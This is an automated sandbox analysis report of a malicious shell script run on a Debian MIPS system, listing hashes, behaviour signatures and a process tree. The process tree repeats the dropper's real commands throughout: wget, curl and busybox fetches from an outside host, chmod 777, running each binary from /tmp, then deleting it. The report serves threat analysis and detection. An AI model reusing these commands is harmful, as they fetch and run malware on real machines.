Analysis
-
max time kernel
115s -
max time network
118s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/11/2024, 08:31
Static task
static1
Behavioral task
behavioral1
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
-
Size
10KB
-
MD5
adde5a6a03a737c7793c75dfe510b0fd
-
SHA1
a134f05a5c12be4898be3c500cc2c7bb8953af7a
-
SHA256
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446
-
SHA512
f98bc88c3067df5a7c45af7fba52a32ad5238e8c34a21629a6f9f030faf527d0682ba152b2ab1a6034b9a5e72e45f11571ea11b9aa7c6a904fb79816e0ce6f01
-
SSDEEP
96:YDfWUrHHlznz7zYLeOpLddJFLSmPh04HoyKlC2mg0X1VQLqiq6qIFxhIEx59595m:Z2u9RFvxQLnnEtDmdnnEtDDMtK
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 938 chmod 945 chmod 857 chmod 875 chmod 903 chmod 809 chmod 882 chmod 896 chmod 868 chmod 889 chmod 966 chmod 817 chmod 959 chmod 733 chmod 910 chmod 1001 chmod 832 chmod 952 chmod 973 chmod 917 chmod 924 chmod 987 chmod 931 chmod 980 chmod 994 chmod 741 chmod 748 chmod 779 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls 734 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs 742 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs 749 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G 780 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb 810 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe 818 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm 834 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 858 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc 869 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD 876 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn 883 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM 890 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z 897 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ 904 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm 911 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 918 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn 925 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM 932 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z 939 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ 946 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc 953 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD 960 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs 967 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs 974 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G 981 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls 988 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb 995 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe 1002 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 791 curl 923 busybox 874 busybox 900 curl 920 wget 993 busybox 747 busybox 774 busybox 829 busybox 963 curl 969 wget 740 busybox 752 wget 762 curl 890 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM 904 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ 937 busybox 948 wget 965 busybox 976 wget 1000 busybox 846 curl 872 curl 947 rm 737 wget 814 curl 899 wget 902 busybox 934 wget 935 curl 970 curl 979 busybox 997 wget 871 wget 888 busybox 933 rm 942 curl 812 wget 821 curl 879 curl 893 curl 962 wget 838 wget 867 busybox 916 busybox 927 wget 930 busybox 949 curl 951 busybox 891 rm 913 wget 932 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM 986 busybox 745 curl 816 busybox 885 wget 906 wget 909 busybox 984 curl 998 curl 785 wget 878 wget 914 curl 941 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls curl File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 curl File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls curl File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs curl File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe curl File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn curl File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM curl File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe curl File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs curl File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs curl File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs curl File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb curl File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z curl File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD curl File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G curl File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb curl File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm curl File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn curl File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM curl File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ curl File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm curl File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 curl File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc curl File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD curl File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z curl File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ curl File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc curl File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G curl
Processes
-
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:732
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:804
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:853
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:881
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:895
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:904
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:932
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
